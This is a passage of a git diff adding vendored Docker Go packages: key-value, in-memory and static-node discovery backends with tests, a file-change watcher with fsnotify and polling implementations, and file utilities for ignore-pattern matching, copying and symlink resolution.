+		Endpoints:  []string{"127.0.0.1:1234"},
+		mockKVChan: mockCh,
+	}
+
+	d := &Discovery{backend: store.CONSUL}
+	d.Initialize("127.0.0.1:1234/path", 0, 0, nil)
+	d.store = storeMock
+
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "1.1.1.1", Port: "1111"},
+		&discovery.Entry{Host: "2.2.2.2", Port: "2222"},
+	}
+	kvs := []*store.KVPair{
+		{Key: path.Join("path", defaultDiscoveryPath, "1.1.1.1"), Value: []byte("1.1.1.1:1111")},
+		{Key: path.Join("path", defaultDiscoveryPath, "2.2.2.2"), Value: []byte("2.2.2.2:2222")},
+	}
+
+	stopCh := make(chan struct{})
+	ch, errCh := d.Watch(stopCh)
+
+	// It should fire an error since the first WatchTree call failed.
+	c.Assert(<-errCh, check.ErrorMatches, "test error")
+	// We have to drain the error channel otherwise Watch will get stuck.
+	go func() {
+		for range errCh {
+		}
+	}()
+
+	// Push the entries into the store channel and make sure discovery emits.
+	mockCh <- kvs
+	c.Assert(<-ch, check.DeepEquals, expected)
+
+	// Add a new entry.
+	expected = append(expected, &discovery.Entry{Host: "3.3.3.3", Port: "3333"})
+	kvs = append(kvs, &store.KVPair{Key: path.Join("path", defaultDiscoveryPath, "3.3.3.3"), Value: []byte("3.3.3.3:3333")})
+	mockCh <- kvs
+	c.Assert(<-ch, check.DeepEquals, expected)
+
+	close(mockCh)
+	// Give it enough time to call WatchTree.
+	time.Sleep(3 * time.Second)
+
+	// Stop and make sure it closes all channels.
+	close(stopCh)
+	c.Assert(<-ch, check.IsNil)
+	c.Assert(<-errCh, check.IsNil)
+}
+
+// FakeStore implements store.Store methods. It mocks all store
+// function in a simple, naive way.
+type FakeStore struct {
+	Endpoints  []string
+	Options    *store.Config
+	mockKVChan <-chan []*store.KVPair
+
+	watchTreeCallCount int
+}
+
+func (s *FakeStore) Put(key string, value []byte, options *store.WriteOptions) error {
+	return nil
+}
+
+func (s *FakeStore) Get(key string) (*store.KVPair, error) {
+	return nil, nil
+}
+
+func (s *FakeStore) Delete(key string) error {
+	return nil
+}
+
+func (s *FakeStore) Exists(key string) (bool, error) {
+	return true, nil
+}
+
+func (s *FakeStore) Watch(key string, stopCh <-chan struct{}) (<-chan *store.KVPair, error) {
+	return nil, nil
+}
+
+// WatchTree will fail the first time, and return the mockKVchan afterwards.
+// This is the behavior we need for testing.. If we need 'moar', should update this.
+func (s *FakeStore) WatchTree(directory string, stopCh <-chan struct{}) (<-chan []*store.KVPair, error) {
+	if s.watchTreeCallCount == 0 {
+		s.watchTreeCallCount = 1
+		return nil, errors.New("test error")
+	}
+	// First calls error
+	return s.mockKVChan, nil
+}
+
+func (s *FakeStore) NewLock(key string, options *store.LockOptions) (store.Locker, error) {
+	return nil, nil
+}
+
+func (s *FakeStore) List(directory string) ([]*store.KVPair, error) {
+	return []*store.KVPair{}, nil
+}
+
+func (s *FakeStore) DeleteTree(directory string) error {
+	return nil
+}
+
+func (s *FakeStore) AtomicPut(key string, value []byte, previous *store.KVPair, options *store.WriteOptions) (bool, *store.KVPair, error) {
+	return true, nil, nil
+}
+
+func (s *FakeStore) AtomicDelete(key string, previous *store.KVPair) (bool, error) {
+	return true, nil
+}
+
+func (s *FakeStore) Close() {
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go
new file mode 100644
index 0000000000..ba8b1f55f3
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go
@@ -0,0 +1,93 @@
+package memory
+
+import (
+	"sync"
+	"time"
+
+	"github.com/docker/docker/pkg/discovery"
+)
+
+// Discovery implements a discovery backend that keeps
+// data in memory.
+type Discovery struct {
+	heartbeat time.Duration
+	values    []string
+	mu        sync.Mutex
+}
+
+func init() {
+	Init()
+}
+
+// Init registers the memory backend on demand.
+func Init() {
+	discovery.Register("memory", &Discovery{})
+}
+
+// Initialize sets the heartbeat for the memory backend.
+func (s *Discovery) Initialize(_ string, heartbeat time.Duration, _ time.Duration, _ map[string]string) error {
+	s.heartbeat = heartbeat
+	s.values = make([]string, 0)
+	return nil
+}
+
+// Watch sends periodic discovery updates to a channel.
+func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) {
+	ch := make(chan discovery.Entries)
+	errCh := make(chan error)
+	ticker := time.NewTicker(s.heartbeat)
+
+	go func() {
+		defer close(errCh)
+		defer close(ch)
+
+		// Send the initial entries if available.
+		var currentEntries discovery.Entries
+		var err error
+
+		s.mu.Lock()
+		if len(s.values) > 0 {
+			currentEntries, err = discovery.CreateEntries(s.values)
+		}
+		s.mu.Unlock()
+
+		if err != nil {
+			errCh <- err
+		} else if currentEntries != nil {
+			ch <- currentEntries
+		}
+
+		// Periodically send updates.
+		for {
+			select {
+			case <-ticker.C:
+				s.mu.Lock()
+				newEntries, err := discovery.CreateEntries(s.values)
+				s.mu.Unlock()
+				if err != nil {
+					errCh <- err
+					continue
+				}
+
+				// Check if the file has really changed.
+				if !newEntries.Equals(currentEntries) {
+					ch <- newEntries
+				}
+				currentEntries = newEntries
+			case <-stopCh:
+				ticker.Stop()
+				return
+			}
+		}
+	}()
+
+	return ch, errCh
+}
+
+// Register adds a new address to the discovery.
+func (s *Discovery) Register(addr string) error {
+	s.mu.Lock()
+	s.values = append(s.values, addr)
+	s.mu.Unlock()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go
new file mode 100644
index 0000000000..c2da0a068e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go
@@ -0,0 +1,48 @@
+package memory
+
+import (
+	"testing"
+
+	"github.com/docker/docker/pkg/discovery"
+	"github.com/go-check/check"
+)
+
+// Hook up gocheck into the "go test" runner.
+func Test(t *testing.T) { check.TestingT(t) }
+
+type discoverySuite struct{}
+
+var _ = check.Suite(&discoverySuite{})
+
+func (s *discoverySuite) TestWatch(c *check.C) {
+	d := &Discovery{}
+	d.Initialize("foo", 1000, 0, nil)
+	stopCh := make(chan struct{})
+	ch, errCh := d.Watch(stopCh)
+
+	// We have to drain the error channel otherwise Watch will get stuck.
+	go func() {
+		for range errCh {
+		}
+	}()
+
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "1.1.1.1", Port: "1111"},
+	}
+
+	c.Assert(d.Register("1.1.1.1:1111"), check.IsNil)
+	c.Assert(<-ch, check.DeepEquals, expected)
+
+	expected = discovery.Entries{
+		&discovery.Entry{Host: "1.1.1.1", Port: "1111"},
+		&discovery.Entry{Host: "2.2.2.2", Port: "2222"},
+	}
+
+	c.Assert(d.Register("2.2.2.2:2222"), check.IsNil)
+	c.Assert(<-ch, check.DeepEquals, expected)
+
+	// Stop and make sure it closes all channels.
+	close(stopCh)
+	c.Assert(<-ch, check.IsNil)
+	c.Assert(<-errCh, check.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go
new file mode 100644
index 0000000000..c0e3c07b22
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go
@@ -0,0 +1,54 @@
+package nodes
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/discovery"
+)
+
+// Discovery is exported
+type Discovery struct {
+	entries discovery.Entries
+}
+
+func init() {
+	Init()
+}
+
+// Init is exported
+func Init() {
+	discovery.Register("nodes", &Discovery{})
+}
+
+// Initialize is exported
+func (s *Discovery) Initialize(uris string, _ time.Duration, _ time.Duration, _ map[string]string) error {
+	for _, input := range strings.Split(uris, ",") {
+		for _, ip := range discovery.Generate(input) {
+			entry, err := discovery.NewEntry(ip)
+			if err != nil {
+				return fmt.Errorf("%s, please check you are using the correct discovery (missing token:// ?)", err.Error())
+			}
+			s.entries = append(s.entries, entry)
+		}
+	}
+
+	return nil
+}
+
+// Watch is exported
+func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) {
+	ch := make(chan discovery.Entries)
+	go func() {
+		defer close(ch)
+		ch <- s.entries
+		<-stopCh
+	}()
+	return ch, nil
+}
+
+// Register is exported
+func (s *Discovery) Register(addr string) error {
+	return discovery.ErrNotImplemented
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go
new file mode 100644
index 0000000000..e26568cf54
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go
@@ -0,0 +1,51 @@
+package nodes
+
+import (
+	"testing"
+
+	"github.com/docker/docker/pkg/discovery"
+
+	"github.com/go-check/check"
+)
+
+// Hook up gocheck into the "go test" runner.
+func Test(t *testing.T) { check.TestingT(t) }
+
+type DiscoverySuite struct{}
+
+var _ = check.Suite(&DiscoverySuite{})
+
+func (s *DiscoverySuite) TestInitialize(c *check.C) {
+	d := &Discovery{}
+	d.Initialize("1.1.1.1:1111,2.2.2.2:2222", 0, 0, nil)
+	c.Assert(len(d.entries), check.Equals, 2)
+	c.Assert(d.entries[0].String(), check.Equals, "1.1.1.1:1111")
+	c.Assert(d.entries[1].String(), check.Equals, "2.2.2.2:2222")
+}
+
+func (s *DiscoverySuite) TestInitializeWithPattern(c *check.C) {
+	d := &Discovery{}
+	d.Initialize("1.1.1.[1:2]:1111,2.2.2.[2:4]:2222", 0, 0, nil)
+	c.Assert(len(d.entries), check.Equals, 5)
+	c.Assert(d.entries[0].String(), check.Equals, "1.1.1.1:1111")
+	c.Assert(d.entries[1].String(), check.Equals, "1.1.1.2:1111")
+	c.Assert(d.entries[2].String(), check.Equals, "2.2.2.2:2222")
+	c.Assert(d.entries[3].String(), check.Equals, "2.2.2.3:2222")
+	c.Assert(d.entries[4].String(), check.Equals, "2.2.2.4:2222")
+}
+
+func (s *DiscoverySuite) TestWatch(c *check.C) {
+	d := &Discovery{}
+	d.Initialize("1.1.1.1:1111,2.2.2.2:2222", 0, 0, nil)
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "1.1.1.1", Port: "1111"},
+		&discovery.Entry{Host: "2.2.2.2", Port: "2222"},
+	}
+	ch, _ := d.Watch(nil)
+	c.Assert(expected.Equals(<-ch), check.Equals, true)
+}
+
+func (s *DiscoverySuite) TestRegister(c *check.C) {
+	d := &Discovery{}
+	c.Assert(d.Register("0.0.0.0"), check.NotNil)
+}
diff --git a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go
new file mode 100644
index 0000000000..7a81cbda95
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go
@@ -0,0 +1,40 @@
+// Package filenotify provides a mechanism for watching file(s) for changes.
+// Generally leans on fsnotify, but provides a poll-based notifier which fsnotify does not support.
+// These are wrapped up in a common interface so that either can be used interchangeably in your code.
+package filenotify
+
+import "github.com/fsnotify/fsnotify"
+
+// FileWatcher is an interface for implementing file notification watchers
+type FileWatcher interface {
+	Events() <-chan fsnotify.Event
+	Errors() <-chan error
+	Add(name string) error
+	Remove(name string) error
+	Close() error
+}
+
+// New tries to use an fs-event watcher, and falls back to the poller if there is an error
+func New() (FileWatcher, error) {
+	if watcher, err := NewEventWatcher(); err == nil {
+		return watcher, nil
+	}
+	return NewPollingWatcher(), nil
+}
+
+// NewPollingWatcher returns a poll-based file watcher
+func NewPollingWatcher() FileWatcher {
+	return &filePoller{
+		events: make(chan fsnotify.Event),
+		errors: make(chan error),
+	}
+}
+
+// NewEventWatcher returns an fs-event based file watcher
+func NewEventWatcher() (FileWatcher, error) {
+	watcher, err := fsnotify.NewWatcher()
+	if err != nil {
+		return nil, err
+	}
+	return &fsNotifyWatcher{watcher}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go
new file mode 100644
index 0000000000..5d08a997a0
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go
@@ -0,0 +1,18 @@
+package filenotify
+
+import "github.com/fsnotify/fsnotify"
+
+// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifer interface
+type fsNotifyWatcher struct {
+	*fsnotify.Watcher
+}
+
+// Events returns the fsnotify event channel receiver
+func (w *fsNotifyWatcher) Events() <-chan fsnotify.Event {
+	return w.Watcher.Events
+}
+
+// Errors returns the fsnotify error channel receiver
+func (w *fsNotifyWatcher) Errors() <-chan error {
+	return w.Watcher.Errors
+}
diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller.go b/vendor/github.com/docker/docker/pkg/filenotify/poller.go
new file mode 100644
index 0000000000..dc5ccd0f7f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/filenotify/poller.go
@@ -0,0 +1,204 @@
+package filenotify
+
+import (
+	"errors"
+	"fmt"
+	"os"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+
+	"github.com/fsnotify/fsnotify"
+)
+
+var (
+	// errPollerClosed is returned when the poller is closed
+	errPollerClosed = errors.New("poller is closed")
+	// errNoSuchPoller is returned when trying to remove a watch that doesn't exist
+	errNoSuchWatch = errors.New("poller does not exist")
+)
+
+// watchWaitTime is the time to wait between file poll loops
+const watchWaitTime = 200 * time.Millisecond
+
+// filePoller is used to poll files for changes, especially in cases where fsnotify
+// can't be run (e.g. when inotify handles are exhausted)
+// filePoller satisfies the FileWatcher interface
+type filePoller struct {
+	// watches is the list of files currently being polled, close the associated channel to stop the watch
+	watches map[string]chan struct{}
+	// events is the channel to listen to for watch events
+	events chan fsnotify.Event
+	// errors is the channel to listen to for watch errors
+	errors chan error
+	// mu locks the poller for modification
+	mu sync.Mutex
+	// closed is used to specify when the poller has already closed
+	closed bool
+}
+
+// Add adds a filename to the list of watches
+// once added the file is polled for changes in a separate goroutine
+func (w *filePoller) Add(name string) error {
+	w.mu.Lock()
+	defer w.mu.Unlock()
+
+	if w.closed == true {
+		return errPollerClosed
+	}
+
+	f, err := os.Open(name)
+	if err != nil {
+		return err
+	}
+	fi, err := os.Stat(name)
+	if err != nil {
+		return err
+	}
+
+	if w.watches == nil {
+		w.watches = make(map[string]chan struct{})
+	}
+	if _, exists := w.watches[name]; exists {
+		return fmt.Errorf("watch exists")
+	}
+	chClose := make(chan struct{})
+	w.watches[name] = chClose
+
+	go w.watch(f, fi, chClose)
+	return nil
+}
+
+// Remove stops and removes watch with the specified name
+func (w *filePoller) Remove(name string) error {
+	w.mu.Lock()
+	defer w.mu.Unlock()
+	return w.remove(name)
+}
+
+func (w *filePoller) remove(name string) error {
+	if w.closed == true {
+		return errPollerClosed
+	}
+
+	chClose, exists := w.watches[name]
+	if !exists {
+		return errNoSuchWatch
+	}
+	close(chClose)
+	delete(w.watches, name)
+	return nil
+}
+
+// Events returns the event channel
+// This is used for notifications on events about watched files
+func (w *filePoller) Events() <-chan fsnotify.Event {
+	return w.events
+}
+
+// Errors returns the errors channel
+// This is used for notifications about errors on watched files
+func (w *filePoller) Errors() <-chan error {
+	return w.errors
+}
+
+// Close closes the poller
+// All watches are stopped, removed, and the poller cannot be added to
+func (w *filePoller) Close() error {
+	w.mu.Lock()
+	defer w.mu.Unlock()
+
+	if w.closed {
+		return nil
+	}
+
+	w.closed = true
+	for name := range w.watches {
+		w.remove(name)
+		delete(w.watches, name)
+	}
+	return nil
+}
+
+// sendEvent publishes the specified event to the events channel
+func (w *filePoller) sendEvent(e fsnotify.Event, chClose <-chan struct{}) error {
+	select {
+	case w.events <- e:
+	case <-chClose:
+		return fmt.Errorf("closed")
+	}
+	return nil
+}
+
+// sendErr publishes the specified error to the errors channel
+func (w *filePoller) sendErr(e error, chClose <-chan struct{}) error {
+	select {
+	case w.errors <- e:
+	case <-chClose:
+		return fmt.Errorf("closed")
+	}
+	return nil
+}
+
+// watch is responsible for polling the specified file for changes
+// upon finding changes to a file or errors, sendEvent/sendErr is called
+func (w *filePoller) watch(f *os.File, lastFi os.FileInfo, chClose chan struct{}) {
+	defer f.Close()
+	for {
+		time.Sleep(watchWaitTime)
+		select {
+		case <-chClose:
+			logrus.Debugf("watch for %s closed", f.Name())
+			return
+		default:
+		}
+
+		fi, err := os.Stat(f.Name())
+		if err != nil {
+			// if we got an error here and lastFi is not set, we can presume that nothing has changed
+			// This should be safe since before `watch()` is called, a stat is performed, there is any error `watch` is not called
+			if lastFi == nil {
+				continue
+			}
+			// If it doesn't exist at this point, it must have been removed
+			// no need to send the error here since this is a valid operation
+			if os.IsNotExist(err) {
+				if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Remove, Name: f.Name()}, chClose); err != nil {
+					return
+				}
+				lastFi = nil
+				continue
+			}
+			// at this point, send the error
+			if err := w.sendErr(err, chClose); err != nil {
+				return
+			}
+			continue
+		}
+
+		if lastFi == nil {
+			if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Create, Name: fi.Name()}, chClose); err != nil {
+				return
+			}
+			lastFi = fi
+			continue
+		}
+
+		if fi.Mode() != lastFi.Mode() {
+			if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Chmod, Name: fi.Name()}, chClose); err != nil {
+				return
+			}
+			lastFi = fi
+			continue
+		}
+
+		if fi.ModTime() != lastFi.ModTime() || fi.Size() != lastFi.Size() {
+			if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Write, Name: fi.Name()}, chClose); err != nil {
+				return
+			}
+			lastFi = fi
+			continue
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go
new file mode 100644
index 0000000000..b4c7825112
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go
@@ -0,0 +1,119 @@
+package filenotify
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"runtime"
+	"testing"
+	"time"
+
+	"github.com/fsnotify/fsnotify"
+)
+
+func TestPollerAddRemove(t *testing.T) {
+	w := NewPollingWatcher()
+
+	if err := w.Add("no-such-file"); err == nil {
+		t.Fatal("should have gotten error when adding a non-existent file")
+	}
+	if err := w.Remove("no-such-file"); err == nil {
+		t.Fatal("should have gotten error when removing non-existent watch")
+	}
+
+	f, err := ioutil.TempFile("", "asdf")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(f.Name())
+
+	if err := w.Add(f.Name()); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := w.Remove(f.Name()); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestPollerEvent(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("No chmod on Windows")
+	}
+	w := NewPollingWatcher()
+
+	f, err := ioutil.TempFile("", "test-poller")
+	if err != nil {
+		t.Fatal("error creating temp file")
+	}
+	defer os.RemoveAll(f.Name())
+	f.Close()
+
+	if err := w.Add(f.Name()); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-w.Events():
+		t.Fatal("got event before anything happened")
+	case <-w.Errors():
+		t.Fatal("got error before anything happened")
+	default:
+	}
+
+	if err := ioutil.WriteFile(f.Name(), []byte("hello"), 644); err != nil {
+		t.Fatal(err)
+	}
+	if err := assertEvent(w, fsnotify.Write); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Chmod(f.Name(), 600); err != nil {
+		t.Fatal(err)
+	}
+	if err := assertEvent(w, fsnotify.Chmod); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Remove(f.Name()); err != nil {
+		t.Fatal(err)
+	}
+	if err := assertEvent(w, fsnotify.Remove); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestPollerClose(t *testing.T) {
+	w := NewPollingWatcher()
+	if err := w.Close(); err != nil {
+		t.Fatal(err)
+	}
+	// test double-close
+	if err := w.Close(); err != nil {
+		t.Fatal(err)
+	}
+
+	f, err := ioutil.TempFile("", "asdf")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(f.Name())
+	if err := w.Add(f.Name()); err == nil {
+		t.Fatal("should have gotten error adding watch for closed watcher")
+	}
+}
+
+func assertEvent(w FileWatcher, eType fsnotify.Op) error {
+	var err error
+	select {
+	case e := <-w.Events():
+		if e.Op != eType {
+			err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e)
+		}
+	case e := <-w.Errors():
+		err = fmt.Errorf("got unexpected error waiting for events %v: %v", eType, e)
+	case <-time.After(watchWaitTime * 3):
+		err = fmt.Errorf("timeout waiting for event %v", eType)
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go
new file mode 100644
index 0000000000..c63ae75ce8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go
@@ -0,0 +1,283 @@
+package fileutils
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"text/scanner"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// exclusion returns true if the specified pattern is an exclusion
+func exclusion(pattern string) bool {
+	return pattern[0] == '!'
+}
+
+// empty returns true if the specified pattern is empty
+func empty(pattern string) bool {
+	return pattern == ""
+}
+
+// CleanPatterns takes a slice of patterns returns a new
+// slice of patterns cleaned with filepath.Clean, stripped
+// of any empty patterns and lets the caller know whether the
+// slice contains any exception patterns (prefixed with !).
+func CleanPatterns(patterns []string) ([]string, [][]string, bool, error) {
+	// Loop over exclusion patterns and:
+	// 1. Clean them up.
+	// 2. Indicate whether we are dealing with any exception rules.
+	// 3. Error if we see a single exclusion marker on its own (!).
+	cleanedPatterns := []string{}
+	patternDirs := [][]string{}
+	exceptions := false
+	for _, pattern := range patterns {
+		// Eliminate leading and trailing whitespace.
+		pattern = strings.TrimSpace(pattern)
+		if empty(pattern) {
+			continue
+		}
+		if exclusion(pattern) {
+			if len(pattern) == 1 {
+				return nil, nil, false, errors.New("Illegal exclusion pattern: !")
+			}
+			exceptions = true
+		}
+		pattern = filepath.Clean(pattern)
+		cleanedPatterns = append(cleanedPatterns, pattern)
+		if exclusion(pattern) {
+			pattern = pattern[1:]
+		}
+		patternDirs = append(patternDirs, strings.Split(pattern, string(os.PathSeparator)))
+	}
+
+	return cleanedPatterns, patternDirs, exceptions, nil
+}
+
+// Matches returns true if file matches any of the patterns
+// and isn't excluded by any of the subsequent patterns.
+func Matches(file string, patterns []string) (bool, error) {
+	file = filepath.Clean(file)
+
+	if file == "." {
+		// Don't let them exclude everything, kind of silly.
+		return false, nil
+	}
+
+	patterns, patDirs, _, err := CleanPatterns(patterns)
+	if err != nil {
+		return false, err
+	}
+
+	return OptimizedMatches(file, patterns, patDirs)
+}
+
+// OptimizedMatches is basically the same as fileutils.Matches() but optimized for archive.go.
+// It will assume that the inputs have been preprocessed and therefore the function
+// doesn't need to do as much error checking and clean-up. This was done to avoid
+// repeating these steps on each file being checked during the archive process.
+// The more generic fileutils.Matches() can't make these assumptions.
+func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool, error) {
+	matched := false
+	file = filepath.FromSlash(file)
+	parentPath := filepath.Dir(file)
+	parentPathDirs := strings.Split(parentPath, string(os.PathSeparator))
+
+	for i, pattern := range patterns {
+		negative := false
+
+		if exclusion(pattern) {
+			negative = true
+			pattern = pattern[1:]
+		}
+
+		match, err := regexpMatch(pattern, file)
+		if err != nil {
+			return false, fmt.Errorf("Error in pattern (%s): %s", pattern, err)
+		}
+
+		if !match && parentPath != "." {
+			// Check to see if the pattern matches one of our parent dirs.
+			if len(patDirs[i]) <= len(parentPathDirs) {
+				match, _ = regexpMatch(strings.Join(patDirs[i], string(os.PathSeparator)),
+					strings.Join(parentPathDirs[:len(patDirs[i])], string(os.PathSeparator)))
+			}
+		}
+
+		if match {
+			matched = !negative
+		}
+	}
+
+	if matched {
+		logrus.Debugf("Skipping excluded path: %s", file)
+	}
+
+	return matched, nil
+}
+
+// regexpMatch tries to match the logic of filepath.Match but
+// does so using regexp logic. We do this so that we can expand the
+// wildcard set to include other things, like "**" to mean any number
+// of directories.  This means that we should be backwards compatible
+// with filepath.Match(). We'll end up supporting more stuff, due to
+// the fact that we're using regexp, but that's ok - it does no harm.
+//
+// As per the comment in golangs filepath.Match, on Windows, escaping
+// is disabled. Instead, '\\' is treated as path separator.
+func regexpMatch(pattern, path string) (bool, error) {
+	regStr := "^"
+
+	// Do some syntax checking on the pattern.
+	// filepath's Match() has some really weird rules that are inconsistent
+	// so instead of trying to dup their logic, just call Match() for its
+	// error state and if there is an error in the pattern return it.
+	// If this becomes an issue we can remove this since its really only
+	// needed in the error (syntax) case - which isn't really critical.
+	if _, err := filepath.Match(pattern, path); err != nil {
+		return false, err
+	}
+
+	// Go through the pattern and convert it to a regexp.
+	// We use a scanner so we can support utf-8 chars.
+	var scan scanner.Scanner
+	scan.Init(strings.NewReader(pattern))
+
+	sl := string(os.PathSeparator)
+	escSL := sl
+	if sl == `\` {
+		escSL += `\`
+	}
+
+	for scan.Peek() != scanner.EOF {
+		ch := scan.Next()
+
+		if ch == '*' {
+			if scan.Peek() == '*' {
+				// is some flavor of "**"
+				scan.Next()
+
+				if scan.Peek() == scanner.EOF {
+					// is "**EOF" - to align with .gitignore just accept all
+					regStr += ".*"
+				} else {
+					// is "**"
+					regStr += "((.*" + escSL + ")|([^" + escSL + "]*))"
+				}
+
+				// Treat **/ as ** so eat the "/"
+				if string(scan.Peek()) == sl {
+					scan.Next()
+				}
+			} else {
+				// is "*" so map it to anything but "/"
+				regStr += "[^" + escSL + "]*"
+			}
+		} else if ch == '?' {
+			// "?" is any char except "/"
+			regStr += "[^" + escSL + "]"
+		} else if ch == '.' || ch == '$' {
+			// Escape some regexp special chars that have no meaning
+			// in golang's filepath.Match
+			regStr += `\` + string(ch)
+		} else if ch == '\\' {
+			// escape next char. Note that a trailing \ in the pattern
+			// will be left alone (but need to escape it)
+			if sl == `\` {
+				// On windows map "\" to "\\", meaning an escaped backslash,
+				// and then just continue because filepath.Match on
+				// Windows doesn't allow escaping at all
+				regStr += escSL
+				continue
+			}
+			if scan.Peek() != scanner.EOF {
+				regStr += `\` + string(scan.Next())
+			} else {
+				regStr += `\`
+			}
+		} else {
+			regStr += string(ch)
+		}
+	}
+
+	regStr += "$"
+
+	res, err := regexp.MatchString(regStr, path)
+
+	// Map regexp's error to filepath's so no one knows we're not using filepath
+	if err != nil {
+		err = filepath.ErrBadPattern
+	}
+
+	return res, err
+}
+
+// CopyFile copies from src to dst until either EOF is reached
+// on src or an error occurs. It verifies src exists and removes
+// the dst if it exists.
+func CopyFile(src, dst string) (int64, error) {
+	cleanSrc := filepath.Clean(src)
+	cleanDst := filepath.Clean(dst)
+	if cleanSrc == cleanDst {
+		return 0, nil
+	}
+	sf, err := os.Open(cleanSrc)
+	if err != nil {
+		return 0, err
+	}
+	defer sf.Close()
+	if err := os.Remove(cleanDst); err != nil && !os.IsNotExist(err) {
+		return 0, err
+	}
+	df, err := os.Create(cleanDst)
+	if err != nil {
+		return 0, err
+	}
+	defer df.Close()
+	return io.Copy(df, sf)
+}
+
+// ReadSymlinkedDirectory returns the target directory of a symlink.
+// The target of the symbolic link may not be a file.
+func ReadSymlinkedDirectory(path string) (string, error) {
+	var realPath string
+	var err error
+	if realPath, err = filepath.Abs(path); err != nil {
+		return "", fmt.Errorf("unable to get absolute path for %s: %s", path, err)
+	}
+	if realPath, err = filepath.EvalSymlinks(realPath); err != nil {
+		return "", fmt.Errorf("failed to canonicalise path for %s: %s", path, err)
+	}
+	realPathInfo, err := os.Stat(realPath)
+	if err != nil {
+		return "", fmt.Errorf("failed to stat target '%s' of '%s': %s", realPath, path, err)
+	}
+	if !realPathInfo.Mode().IsDir() {
+		return "", fmt.Errorf("canonical path points to a file '%s'", realPath)
+	}
+	return realPath, nil
+}
+
+// CreateIfNotExists creates a file or a directory only if it does not already exist.
+func CreateIfNotExists(path string, isDir bool) error {
+	if _, err := os.Stat(path); err != nil {
+		if os.IsNotExist(err) {
+			if isDir {
+				return os.MkdirAll(path, 0755)
+			}
+			if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil {
+				return err
+			}
+			f, err := os.OpenFile(path, os.O_CREATE, 0755)
+			if err != nil {
+				return err
+			}
+			f.Close()
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go
new file mode 100644
index 0000000000..ccd648fac3
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go
@@ -0,0 +1,27 @@
+package fileutils
+
+import (
+	"os"
+	"os/exec"
+	"strconv"
+	"strings"
+)
+
+// GetTotalUsedFds returns the number of used File Descriptors by
+// executing `lsof -p PID`
+func GetTotalUsedFds() int {
+	pid := os.Getpid()
+
+	cmd := exec.Command("lsof", "-p", strconv.Itoa(pid))
+
+	output, err := cmd.CombinedOutput()
+	if err != nil {
+		return -1
+	}
+
+	outputStr := strings.TrimSpace(string(output))
+
+	fds := strings.Split(outputStr, "\n")
+
+	return len(fds) - 1
+}
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go
new file mode 100644
index 0000000000..0f2cb7ab93
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go
@@ -0,0 +1,7 @@
+package fileutils
+
+// GetTotalUsedFds Returns the number of used File Descriptors.
